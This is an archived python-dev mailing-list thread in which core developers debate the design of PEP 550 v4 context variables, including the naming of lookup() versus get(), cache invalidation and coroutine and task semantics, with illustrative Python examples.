Third, you will usually have your "with my_context()" block right around your code (or within a few awaits' distance), otherwise it will be hard to reason about what the context is.  And if, occasionally, you have a single "var.lookup()" call that won't be cached, the cost of it will still be measured in microseconds.

Finally, the easy-to-follow semantics are the main argument for the change (even at the cost of making "get()" a bit slower in corner cases).

> I think I see the motivation: you want to make
>
>     await sub()
>
> and
>
>     await ensure_future(sub())
>
> have the same semantics, right?

Yes.

> And the latter has to create a Task
> and split it off into a new execution context, so you want the former
> to do so as well? But to me this is like saying that we want
>
>     sync_sub()
>
> and
>
>     thread_pool_executor.submit(sync_sub).result()

This example is very similar to:

    await sub()

and

    await create_task(sub())

So it's really about making the semantics for coroutines predictable.

> (And fwiw I'm still not convinced we should give up on 'yield from' as
> a mechanism for refactoring generators.)

I don't get this "refactoring generators" and "refactoring coroutines" argument.

Suppose you have this code:

    def gen():
        i = 0
        for _ in range(3):
            i += 1
            yield i
        for _ in range(5):
            i += 1
            yield i

You can't refactor gen() by simply copying/pasting parts of its body into a separate generator:

    def count3():
        for _ in range(3):
            i += 1
            yield

    def gen():
        i = 0
        yield from count3()
        for _ in range(5):
            i += 1
            yield i

The above won't work for some obvious reasons: 'i' is a nonlocal variable for the 'count3' block of code.

Almost exactly the same thing will happen with the current PEP 550 specification, which is a *good* thing.
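[To make the parallel concrete, here is a sketch of the same broken refactoring expressed with context variables, assuming the PEP 550 semantics described above.  ``sys.new_context_var`` is the API proposed by this PEP and does not exist yet, so this is illustrative only:

    import sys

    var = sys.new_context_var('var')

    def gen():
        var.set('gen')      # lands in gen()'s own logical context
        yield
        assert var.lookup() == 'gen'
        yield

    def sub():
        var.set('sub')      # lands in sub()'s LC, not in gen()'s
        yield

    def gen_refactored():
        var.set('gen')
        yield from sub()    # naive split of the body into a sub-generator
        # Under PEP 550, sub()'s change is isolated in its own LC,
        # just as the nonlocal 'i' above is out of scope in count3().
        assert var.lookup() == 'gen'   # not 'sub'
        yield

    g = gen_refactored()
    next(g)
    next(g)   # would exercise the assert under PEP 550 semantics
]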
'yield from' and 'await' are not about refactoring.  They can be used for splitting large generators/coroutines into a set of smaller ones, sure.  But there's *no* magical, always-working refactoring mechanism that allows one to do that blindly.

>> To establish the full semantics of execution context in coroutines,
>> we must also consider *tasks*.  A task is the abstraction used by
>> *asyncio*, and other similar libraries, to manage the concurrent
>> execution of coroutines.  In the example above, a task is created
>> implicitly by the ``run_until_complete()`` function.
>> ``asyncio.wait_for()`` is another example of implicit task creation::
>>
>>     async def sub():
>>         await asyncio.sleep(1)
>>         assert var.lookup() == 'main'
>>
>>     async def main():
>>         var.set('main')
>>
>>         # waiting for sub() directly
>>         await sub()
>>
>>         # waiting for sub() with a timeout
>>         await asyncio.wait_for(sub(), timeout=2)
>>
>>         var.set('main changed')
>>
>> Intuitively, we expect the assertion in ``sub()`` to hold true in both
>> invocations, even though the ``wait_for()`` implementation actually
>> spawns a task, which runs ``sub()`` concurrently with ``main()``.
>
> I found this example confusing -- you talk about sub() and main()
> running concurrently, but ``wait_for`` blocks main() until sub() has
> finished running, right?

Right.  Before we continue, let me make sure we are on the same page here:

    await asyncio.wait_for(sub(), timeout=2)

can be refactored into:

    task = asyncio.wait_for(sub(), timeout=2)
    # sub() is scheduled now, and a "loop.call_soon" call has been
    # made to advance it soon.
    await task

Now, if we look at the following example (1):

    async def foo():
        await bar()

The "bar()" coroutine will execute within "foo()".  If we add timeout logic (2):

    async def foo():
        await wait_for(bar(), 1)

The "bar()" coroutine will execute outside of "foo()", and "foo()" will only wait for the result of that execution.

Now, Async Tasks capture the context when they are created -- that's the only sane option they have.

If coroutines don't have their own LC, "bar()" in examples (1) and (2) would interact with the execution context differently!  And this is something that we can't let happen, as it would force asyncio users to think about the EC every time they want to wrap a coroutine into a task.

[..]
>> The ``sys.run_with_logical_context()`` function performs the following
>> steps:
>>
>> 1. Push *lc* onto the current execution context stack.
>> 2. Run ``func(*args, **kwargs)``.
>> 3. Pop *lc* from the execution context stack.
>> 4. Return or raise the ``func()`` result.
>
> It occurs to me that both this and the way generator/coroutines expose
> their logical context means that logical context objects are
> semantically mutable. This could create weird effects if someone
> attaches the same LC to two different generators, or tries to use it
> simultaneously in two different threads, etc. We should have a little
> interlock like generator's ag_running, where an LC keeps track of
> whether it's currently in use and if you try to push the same LC onto
> two ECs simultaneously then it errors out.

Correct.  LC (and EC) objects will both be wrapped into "shell" objects before being exposed to the end user.  run_with_logical_context() will mutate the user-visible LC object (keeping the underlying LC immutable, of course).

Ideally, we would want run_with_logical_context to have the following signature:

    result, updated_lc = run_with_logical_context(lc, callable)

But because "callable" can raise an exception this would not work.
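[For illustration, here is a minimal runnable sketch of that "shell" idea.  Everything in it -- ``LogicalContextShell``, the ``_EC_STACK`` list, ``set_var()`` -- is a hypothetical stand-in for the real C-level machinery; the point is only to show why a ``finally`` block can hand the updated LC back to the caller where a ``(result, updated_lc)`` return value could not:

    from types import MappingProxyType

    _EC_STACK = []   # stand-in for the per-thread execution context

    class LogicalContextShell:
        # The user-visible object is mutable, but it only ever
        # points at immutable LC snapshots.
        def __init__(self):
            self._lc = MappingProxyType({})

    def run_with_logical_context(shell, func, *args, **kwargs):
        _EC_STACK.append(shell._lc)
        try:
            return func(*args, **kwargs)   # may return *or* raise
        finally:
            # Store the (possibly updated) topmost LC back into the
            # shell.  A finally block covers both the return and the
            # raise paths, which a (result, updated_lc) tuple cannot.
            shell._lc = _EC_STACK.pop()

    def set_var(name, value):
        # "Mutates" the topmost LC by replacing it with a new snapshot.
        new = dict(_EC_STACK[-1])
        new[name] = value
        _EC_STACK[-1] = MappingProxyType(new)

    # Usage: the shell survives an exception and keeps the update.
    shell = LogicalContextShell()

    def work():
        set_var('x', 42)
        raise RuntimeError

    try:
        run_with_logical_context(shell, work)
    except RuntimeError:
        pass
    assert shell._lc['x'] == 42
]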
> >> For efficient access in performance-sensitive code paths, such as in >> ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``, >> making it an O(1) operation when the cache is hit. The cache key is >> composed from the following: >> >> * The new ``uint64_t PyThreadState->unique_id``, which is a globally >> unique thread state identifier. It is computed from the new >> ``uint64_t PyInterpreterState->ts_counter``, which is incremented >> whenever a new thread state is created. >> >> * The ``uint64_t ContextVar->version`` counter, which is incremented >> whenever the context variable value is changed in any logical context >> in any thread. > > I'm pretty sure you need to also invalidate on context push/pop. Consider: > > def gen(): > var.set("gen") > var.lookup() # cache now holds "gen" > yield > print(var.lookup()) > > def main(): > var.set("main") > g = gen() > next(g) > # This should print "main", but it's the same thread and the last > call to set() was > # the one inside gen(), so we get the cached "gen" instead > print(var.lookup()) > var.set("no really main") > var.lookup() # cache now holds "no really main" > next(g) # should print "gen" but instead prints "no really main" Yeah, you're right. Thanks! > >> The cache is then implemented as follows:: >> >> class ContextVar: >> >> def set(self, value): >> ... # implementation >> self.version += 1 >> >> >> def get(self): > > I think you missed an s/get/lookup/ here :-) Fixed! Yury From yselivanov.ml at gmail.com Sat Aug 26 13:19:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 13:19:55 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 1:10 PM, David Mertz wrote: > Would it be possible/desirable to make the default a unique string value > like a UUID or a stringified counter? Sure, or we could just use the id of ContextVar. In the end, when we want to introspect the EC while debugging, we would see something like this: { ContextVar(name='518CDD4F-D676-408F-B968-E144F792D055'): 42, ContextVar(name='decimal_context'): DecimalContext(precision=2), ContextVar(name='7A44D3BE-F7A1-40B7-BE51-7DFFA7E0E02F'): 'spam' } That's why I think it's easier to force users to always specify the name: my_var = sys.new_context_var('my_var') This is similar to namedtuples, and nobody really complains about them. Yury From ethan at stoneleaf.us Sat Aug 26 13:23:04 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sat, 26 Aug 2017 10:23:04 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: <59A1AE78.6090609@stoneleaf.us> On 08/26/2017 09:25 AM, Yury Selivanov wrote: > On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote: >>> A *context variable* is an object representing a value in the >>> execution context. A new context variable is created by calling >>> the ``new_context_var()`` function. A context variable object has >>> two methods: >>> >>> * ``lookup()``: returns the value of the variable in the current >>> execution context; >>> >>> * ``set()``: sets the value of the variable in the current >>> execution context. >> >> >> Why "lookup" and not "get"? Many APIs use "get" and its functionality is >> well understood. > > The ContextVar.set(value) method writes the `value` to the *topmost LC*. > > The ContextVar.lookup() method *traverses the stack* until it finds the LC > that has a value. "get()" does not reflect this subtle semantic > difference.
A good point; however, ChainMap, which behaves similarly as far as lookup goes, uses "get" and does not have a "lookup" method. I think we lose more than we gain by changing that method name. -- ~Ethan~ From yselivanov.ml at gmail.com Sat Aug 26 13:23:00 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 13:23:00 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A1AE78.6090609@stoneleaf.us> References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On Sat, Aug 26, 2017 at 1:23 PM, Ethan Furman wrote: > On 08/26/2017 09:25 AM, Yury Selivanov wrote: >> >> On Fri, Aug 25, 2017 at 10:19 PM, Ethan Furman wrote: > > >>>> A *context variable* is an object representing a value in the >>>> execution context. A new context variable is created by calling >>>> the ``new_context_var()`` function. A context variable object has >>>> two methods: >>>> >>>> * ``lookup()``: returns the value of the variable in the current >>>> execution context; >>>> >>>> * ``set()``: sets the value of the variable in the current >>>> execution context. >>> >>> >>> >>> Why "lookup" and not "get"? Many APIs use "get" and its functionality >>> is >>> well understood. >> >> >> The ContextVar.set(value) method writes the `value` to the *topmost LC*. >> >> The ContextVar.lookup() method *traverses the stack* until it finds the LC >> that has a value. "get()" does not reflect this subtle semantic >> difference. > > > A good point; however, ChainMap, which behaves similarly as far as lookup > goes, uses "get" and does not have a "lookup" method. I think we lose more > than we gain by changing that method name. ChainMap is constrained to be a Mapping-like object, but I get your point. Let's see what others say about "lookup()". It is kind of an experiment to try a name and see if it fits. Yury From ericsnowcurrently at gmail.com Sat Aug 26 13:25:15 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Sat, 26 Aug 2017 11:25:15 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Thanks for the update. Comments in-line below. -eric On Fri, Aug 25, 2017 at 4:32 PM, Yury Selivanov wrote: > [snip] > > This PEP adds a new generic mechanism of ensuring consistent access > to non-local state in the context of out-of-order execution, such > as in Python generators and coroutines. > > Thread-local storage, such as ``threading.local()``, is inadequate for > programs that execute concurrently in the same OS thread. This PEP > proposes a solution to this problem. > [snip] > > In regular, single-threaded code that doesn't involve generators or > coroutines, context variables behave like globals:: > > [snip] > > In multithreaded code, context variables behave like thread locals:: > > [snip] > > In generators, changes to context variables are local and are not > visible to the caller, but are visible to the code called by the > generator. Once set in the generator, the context variable is > guaranteed not to change between iterations:: With threads we have a directed graph of execution, rooted at the root thread, branching with each new thread and merging with each .join(). Each thread gets its own copy of each threading.local, regardless of the relationship between branches (threads) in the execution graph. With async (and generators) we also have a directed graph of execution, rooted in the calling thread, branching with each new async call. Currently there is no equivalent to threading.local for the async execution graph.
This proposal involves adding such an equivalent. However, the proposed solution isn't quite equivalent, right? It adds a concept of lookup on the chain of namespaces, traversing up the execution graph back to the root. threading.local does not do this. Furthermore, you can have more than one threading.local per thread. From what I read in the PEP, each node in the execution graph has (at most) one Execution Context. The PEP doesn't really say much about these differences from threadlocals, including a rationale. FWIW, I think such a COW mechanism could be useful. However, it does add complexity to the feature. So a clear explanation in the PEP of why it's worth it would be valuable. > [snip] > > The following new Python APIs are introduced by this PEP: > > 1. The ``sys.new_context_var(name: str='...')`` function to create > ``ContextVar`` objects. > > 2. The ``ContextVar`` object, which has: > > * the read-only ``.name`` attribute, > * the ``.lookup()`` method which returns the value of the variable > in the current execution context; > * the ``.set()`` method which sets the value of the variable in > the current execution context. > > 3. The ``sys.get_execution_context()`` function, which returns a > copy of the current execution context. > > 4. The ``sys.new_execution_context()`` function, which returns a new > empty execution context. > > 5. The ``sys.new_logical_context()`` function, which returns a new > empty logical context. > > 6. The ``sys.run_with_execution_context(ec: ExecutionContext, > func, *args, **kwargs)`` function, which runs *func* with the > provided execution context. > > 7. The ``sys.run_with_logical_context(lc: LogicalContext, > func, *args, **kwargs)`` function, which runs *func* with the > provided logical context on top of the current execution context. #1-4 are consistent with a single EC per Python thread. However, #5-7 imply that more than one EC per thread is supported, but only one is active in the current execution stack (notably the EC is rooted at the calling frame). threading.local provides a much simpler mechanism but does not support the chained context (COW) semantics... From ericsnowcurrently at gmail.com Sat Aug 26 13:33:27 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Sat, 26 Aug 2017 11:33:27 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 11:19 AM, Yury Selivanov wrote: > This is similar to namedtuples, and nobody really complains about them. FWIW, there are plenty of complaints on python-ideas about this (and never a satisfactory solution). :) That said, I don't think it is as big a deal here since the target audience is much smaller. -eric From yselivanov.ml at gmail.com Sat Aug 26 14:02:24 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 14:02:24 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: Hi Eric, On Sat, Aug 26, 2017 at 1:25 PM, Eric Snow wrote: > Thanks for the update. Comments in-line below. > > -eric > > On Fri, Aug 25, 2017 at 4:32 PM, Yury Selivanov wrote: >> [snip] >> >> This PEP adds a new generic mechanism of ensuring consistent access >> to non-local state in the context of out-of-order execution, such >> as in Python generators and coroutines. >> >> Thread-local storage, such as ``threading.local()``, is inadequate for >> programs that execute concurrently in the same OS thread. This PEP >> proposes a solution to this problem.
> >> [snip] >> >> In regular, single-threaded code that doesn't involve generators or >> coroutines, context variables behave like globals:: >> >> [snip] >> >> In multithreaded code, context variables behave like thread locals:: >> >> [snip] >> >> In generators, changes to context variables are local and are not >> visible to the caller, but are visible to the code called by the >> generator. Once set in the generator, the context variable is >> guaranteed not to change between iterations:: > > With threads we have a directed graph of execution, rooted at the root > thread, branching with each new thread and merging with each .join(). > Each thread gets its own copy of each threading.local, regardless of > the relationship between branches (threads) in the execution graph. > > With async (and generators) we also have a directed graph of > execution, rooted in the calling thread, branching with each new async > call. Currently there is no equivalent to threading.local for the > async execution graph. This proposal involves adding such an > equivalent. Correct. > > However, the proposed solution isn't quite equivalent, right? It > adds a concept of lookup on the chain of namespaces, traversing up the > execution graph back to the root. threading.local does not do this. > Furthermore, you can have more than one threading.local per thread. > From what I read in the PEP, each node in the execution graph has (at > most) one Execution Context. > > The PEP doesn't really say much about these differences from > threadlocals, including a rationale. FWIW, I think such a COW > mechanism could be useful. However, it does add complexity to the > feature. So a clear explanation in the PEP of why it's worth it would > be valuable. Currently, the PEP covers the proposed mechanism in depth, explaining why every detail of the spec is the way it is. But I think it'd be valuable to highlight differences from threading.local() in a separate section. We'll think about adding one. Yury From yselivanov.ml at gmail.com Sat Aug 26 14:15:41 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sat, 26 Aug 2017 14:15:41 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: On Sat, Aug 26, 2017 at 12:30 PM, Barry Warsaw wrote: > I agree with David; this PEP has really gotten to a great place and the new organization makes it much easier to understand. > >> On Aug 25, 2017, at 22:19, Ethan Furman wrote: >> >> Why "lookup" and not "get"? Many APIs use "get" and its functionality is well understood. > > I have the same question as Sven as to why we can't have attribute access semantics. I probably asked that before, and you probably answered, so maybe if there's a specific reason why this can't be supported, the PEP should include a "rejected ideas" section explaining the choice. Elvis just added it: https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface > > That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`. But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value? I worry that None might be a valid value in some cases, but that currently can't be distinguished from "missing". Nathaniel has a use case where he needs to know if the value is in the topmost LC or not.
One way to address that need is to have the following signature for lookup(): lookup(*, default=None, traverse=True) IMO "lookup" is a slightly better name in this particular context. Yury From barry at python.org Sat Aug 26 14:22:39 2017 From: barry at python.org (Barry Warsaw) Date: Sat, 26 Aug 2017 14:22:39 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> Message-ID: <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> On Aug 26, 2017, at 14:15, Yury Selivanov wrote: > > Elvis just added it: > https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface Thanks, that's exactly what I was looking for. Great summary of the issue. > >> That said, if we have to use method lookup, then I agree that `.get()` is a better choice than `.lookup()`. But in that case, would it be possible to add an optional `default=None` argument so that you can specify a marker object for a missing value? I worry that None might be a valid value in some cases, but that currently can't be distinguished from "missing". > > Nathaniel has a use case where he needs to know if the value is in the > topmost LC or not. > > One way to address that need is to have the following signature for lookup(): > > lookup(*, default=None, traverse=True) > > IMO "lookup" is a slightly better name in this particular context. Given that signature (to which +1), I agree. You could add keywords for debugging lookup fairly easily too. Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From srkunze at mail.de Sat Aug 26 14:30:36 2017 From: srkunze at mail.de (Sven R. Kunze) Date: Sat, 26 Aug 2017 20:30:36 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: <67222d19-ece6-2cac-a60b-cd3ad65f416a@mail.de> On 26.08.2017 19:23, Yury Selivanov wrote: > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about "lookup()". It is kind of > an experiment to try a name and see if it fits. I like "get" more. ;-) Best, Sven PS: This might be a result of still leaning towards attribute access despite the discussion you referenced. I still don't think complicating and reinventing terminology (which basically results in API names) buys us much. And I am still with Ethan: a context stack is just a ChainMap. Renaming basic methods won't hide that fact. That's my only criticism of the PEP. The rest is fine and useful. -------------- next part -------------- An HTML attachment was scrubbed... URL: From mertz at gnosis.cx Sat Aug 26 15:12:02 2017 From: mertz at gnosis.cx (David Mertz) Date: Sat, 26 Aug 2017 12:12:02 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> References: <59A0DAB4.2030807@stoneleaf.us> <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> Message-ID: I'm convinced by the new section explaining why a single value is better than a namespace. Nonetheless, it would feel more "Pythonic" to me to create a property `ContextVariable.val` whose getter and setter were `.lookup()` and `.set()` (or maybe `._lookup()` and `._set()`). Lookup might require a more complex call signature in rare cases, but the large majority of the time it would simply be `var.val`, and that should be the preferred API IMO.
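Concretely, a rough sketch of that wrapper (illustrative only; it just layers a property over the methods the PEP proposes, and assumes the draft sys.new_context_var() constructor):

    import sys

    class ContextVariable:
        def __init__(self, name):
            self._var = sys.new_context_var(name)

        @property
        def val(self):
            # The rare, complex lookups would still go through
            # self._var.lookup(...) with keyword arguments.
            return self._var.lookup()

        @val.setter
        def val(self, value):
            self._var.set(value)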
That provides a nice parallel between `var.name` and `var.val` also. On Sat, Aug 26, 2017 at 11:22 AM, Barry Warsaw wrote: > On Aug 26, 2017, at 14:15, Yury Selivanov wrote: > > > > Elvis just added it: > > https://www.python.org/dev/peps/pep-0550/#replication-of- > threading-local-interface > > Thanks, that's exactly what I was looking for. Great summary of the issue. > > > >> That said, if we have to use method lookup, then I agree that `.get()` > is a better choice than `.lookup()`. But in that case, would it be > possible to add an optional `default=None` argument so that you can specify > a marker object for a missing value? I worry that None might be a valid > value in some cases, but that currently can't be distinguished from > "missing". > > > > Nathaniel has a use case where he needs to know if the value is in the > > topmost LC or not. > > > > One way to address that need is to have the following signature for > lookup(): > > > > lookup(*, default=None, traverse=True) > > > > IMO "lookup" is a slightly better name in this particular context. > > Given that signature (to which +1), I agree. You could add keywords for > debugging lookup fairly easily too. > > Cheers, > -Barry > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > mertz%40gnosis.cx > > -- Keeping medicines from the bloodstreams of the sick; food from the bellies of the hungry; books from the hands of the uneducated; technology from the underdeveloped; and putting advocates of freedom in prisons. Intellectual property is to the 21st century what the slave trade was to the 16th. -------------- next part -------------- An HTML attachment was scrubbed... URL: From francismb at email.de Sat Aug 26 15:36:02 2017 From: francismb at email.de (francismb) Date: Sat, 26 Aug 2017 21:36:02 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <7b28e890-68ee-04cb-dfe6-acabb9cde9b7@email.de> Hi, > > For the purpose of this section, we define *execution context* as an > opaque container of non-local state that allows consistent access to > its contents in the concurrent execution environment. > This may be nonsense/non-practical :-), but: how does this concept extrapolate to the whole interpreter (container of ...non-local state --> interpreter state; concurrent execution environment --> Python interpreter, ...)? Thanks in advance! -- francis From solipsis at pitrou.net Sat Aug 26 16:23:47 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Sat, 26 Aug 2017 22:23:47 +0200 Subject: [Python-Dev] PEP 550 v4 References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: <20170826222347.2374d6ac@fsol> On Sat, 26 Aug 2017 13:23:00 -0400 Yury Selivanov wrote: > > > > A good point; however, ChainMap, which behaves similarly as far as lookup > > goes, uses "get" and does not have a "lookup" method. I think we lose more > > than we gain by changing that method name. > > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about "lookup()". It is kind of > an experiment to try a name and see if it fits. I like "get()" better than "lookup()". Regards Antoine.
From francismb at email.de Sat Aug 26 16:45:07 2017 From: francismb at email.de (francismb) Date: Sat, 26 Aug 2017 22:45:07 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <67011615-0c66-b610-6887-052ff65c97f1@email.de> Hi, > Multithreaded Code > ------------------ > > In multithreaded code, context variables behave like thread locals:: > > var = new_context_var() > > def sub(): > assert var.lookup() is None # The execution context is empty > # for each new thread. > var.set('sub') > > def main(): > var.set('main') > > thread = threading.Thread(target=sub) > thread.start() > thread.join() > > assert var.lookup() == 'main' > Is it by design that the execution context for new threads is empty, or should it be possible to set it to some initial value? Like e.g.: var = new_context_var('init') def sub(): assert var.lookup() == 'init' var.set('sub') def main(): var.set('main') thread = threading.Thread(target=sub) thread.start() thread.join() assert var.lookup() == 'main' Thanks, --francis From ethan at stoneleaf.us Sat Aug 26 17:10:47 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sat, 26 Aug 2017 14:10:47 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> Message-ID: <59A1E3D7.8080001@stoneleaf.us> On 08/26/2017 12:12 PM, David Mertz wrote: > I'm convinced by the new section explaining why a single value is better than a namespace. Nonetheless, it would feel > more "Pythonic" to me to create a property `ContextVariable.val` whose getter and setter were `.lookup()` and `.set()` > (or maybe `._lookup()` and `._set()`). > > Lookup might require a more complex call signature in rare cases, but the large majority of the time it would simply be > `var.val`, and that should be the preferred API IMO. That provides a nice parallel between `var.name` > and `var.val` also. +1 to the property solution. -- ~Ethan~ From njs at pobox.com Sat Aug 26 17:09:08 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sat, 26 Aug 2017 14:09:08 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 10:25 AM, Eric Snow wrote: > With threads we have a directed graph of execution, rooted at the root > thread, branching with each new thread and merging with each .join(). > Each thread gets its own copy of each threading.local, regardless of > the relationship between branches (threads) in the execution graph. > > With async (and generators) we also have a directed graph of > execution, rooted in the calling thread, branching with each new async > call. Currently there is no equivalent to threading.local for the > async execution graph. This proposal involves adding such an > equivalent. > > However, the proposed solution isn't quite equivalent, right? It > adds a concept of lookup on the chain of namespaces, traversing up the > execution graph back to the root. threading.local does not do this. > Furthermore, you can have more than one threading.local per thread. > From what I read in the PEP, each node in the execution graph has (at > most) one Execution Context. > > The PEP doesn't really say much about these differences from > threadlocals, including a rationale. FWIW, I think such a COW > mechanism could be useful. However, it does add complexity to the > feature. So a clear explanation in the PEP of why it's worth it would > be valuable.
You might be interested in these notes I wrote to motivate why we need a chain of namespaces, and why simple "async task locals" aren't sufficient: https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb They might be a bit verbose to include directly in the PEP, but Yury/Elvis, feel free to steal whatever if you think it'd be useful. -n -- Nathaniel J. Smith -- https://vorpus.org From njs at pobox.com Sat Aug 26 19:13:24 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sat, 26 Aug 2017 16:13:24 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <2322879.hcVsH781ou@klinga.prans.org> References: <2322879.hcVsH781ou@klinga.prans.org> Message-ID: On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: > On Saturday, August 26, 2017 2:34:29 AM EDT Nathaniel Smith wrote: >> On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov wrote: >> > Coroutines and Asynchronous Tasks >> > --------------------------------- >> > >> > In coroutines, like in generators, context variable changes are >> > local >> > and are not visible to the caller:: >> > import asyncio >> > >> > var = new_context_var() >> > >> > async def sub(): >> > assert var.lookup() == 'main' >> > var.set('sub') >> > assert var.lookup() == 'sub' >> > >> > async def main(): >> > var.set('main') >> > await sub() >> > assert var.lookup() == 'main' >> > >> > loop = asyncio.get_event_loop() >> > loop.run_until_complete(main()) >> >> I think this change is a bad idea. I think that generally, an async >> call like 'await async_sub()' should have the equivalent semantics to >> a synchronous call like 'sync_sub()', except for the part where the >> former is able to contain yields. Giving every coroutine an LC >> breaks that equivalence. It also makes it so in async code, you >> can't necessarily refactor by moving code in and out of >> subroutines. Like, if we inline 'sub' into 'main', that shouldn't >> change the semantics, but... > > If we could easily, we'd have given each _normal function_ its own logical > context as well. I mean... you could do that. It'd be easy to do technically, right? But it would make the PEP useless, because then projects like decimal and numpy couldn't adopt it without breaking backcompat, meaning they couldn't adopt it at all. The backcompat argument isn't there in the same way for async code, because it's new and these functions have generally been broken there anyway. But it's still kinda there in spirit: there's a huge amount of collective knowledge about how (synchronous) Python code works, and IMO async code should match that whenever possible. > What we are talking about here is variable scope leaking up the call > stack. I think this is a bad pattern. For decimal context-like uses > of the EC you should always use a context manager. For uses like Web > request locals, you always have a top function that sets the context > vars. It's perfectly reasonable to have a script where you call decimal.setcontext or np.seterr somewhere at the top to set the defaults for the rest of the script. Yeah, maybe it'd be a bit cleaner to use a 'with' block wrapped around main(), and certainly in a complex app you want to stick to that, but Python isn't just used for complex apps :-). I foresee confused users trying to figure out why np.seterr suddenly stopped working when they ported their app to use async. This also seems like it makes some cases much trickier. Like, say you have an async context manager that wants to manipulate a context local.
If you write 'async def __aenter__', you just lost -- it'll be isolated. I think you have to write some awkward thing like: def __aenter__(self): coro = self._real_aenter() coro.__logical_context__ = None return coro It would be really nice if libraries like urllib3/requests supported async as an option, but it's difficult because they can't drop support for synchronous operation and python 2, and we want to keep a single codebase. One option I've been exploring is to write them in "synchronous style" but with async/await keywords added, and then generating a py2-compatible version with a script that strips out async/await etc. (Like a really simple 3to2 that just works at the token level.) One transformation you'd want to apply is replacing __aenter__ -> __enter__, but this gets much more difficult if we have to worry about elaborate transformations like the above... If I have an async generator, and I set its __logical_context__ to None, then do I also have to set this attribute on every coroutine returned from calling __anext__/asend/athrow/aclose? >> >> I think I see the motivation: you want to make >> >> await sub() >> >> and >> >> await ensure_future(sub()) >> >> have the same semantics, right? And the latter has to create a Task > > What we want is for `await sub()` to be equivalent to > `await asyncio.wait_for(sub())` and to `await asyncio.gather(sub())`. I don't feel like there's any need to make gather() have exactly the same semantics as a regular call -- it's pretty clearly a task-spawning primitive that runs all of the given coroutines concurrently, so it makes sense that it would have task-spawning semantics rather than call semantics. wait_for is a more unfortunate case; there's really no reason for it to create a Task at all, except that asyncio made the decision to couple cancellation and Tasks, so if you want one then you're stuck with the other. Yury's made some comments about stealing Trio's cancellation system and adding it to asyncio -- I don't know how serious he was. If he did then it would let you use timeouts without creating a new Task, and this problem would go away. OTOH if you stick with pushing a new LC on every coroutine call, then that makes Trio's cancellation system way slower, because it has to walk the whole stack of LCs on every yield to register/unregister each cancel scope. PEP 550v4 makes that stack much deeper, plus breaks the optimization I was planning to use to let us mostly skip this entirely. (To be clear, this isn't the main reason I think these semantics are a bad idea -- the main reason is that I think async and sync code should have the same semantics. But it definitely doesn't help that it creates obstacles to improving asyncio/improving on asyncio.) > Imagine we allow context var changes to leak out of `async def`. It's > easy to write code that relies on this: > > async def init(): > var.set('foo') > > async def main(): > await init() > assert var.lookup() == 'foo' > > If we change `await init()` to `await asyncio.wait_for(init())`, the > code will break (and in real world, possibly very subtly). But instead you're making it so that it will break if the user adds/removes async/await keywords: def init(): var.set('foo') def main(): init() >> It also adds non-trivial overhead, because now lookup() is O(depth >> of async callstack), instead of O(depth of (async) generator >> nesting), which is generally much smaller. > > You would hit cache in lookup() most of the time. 
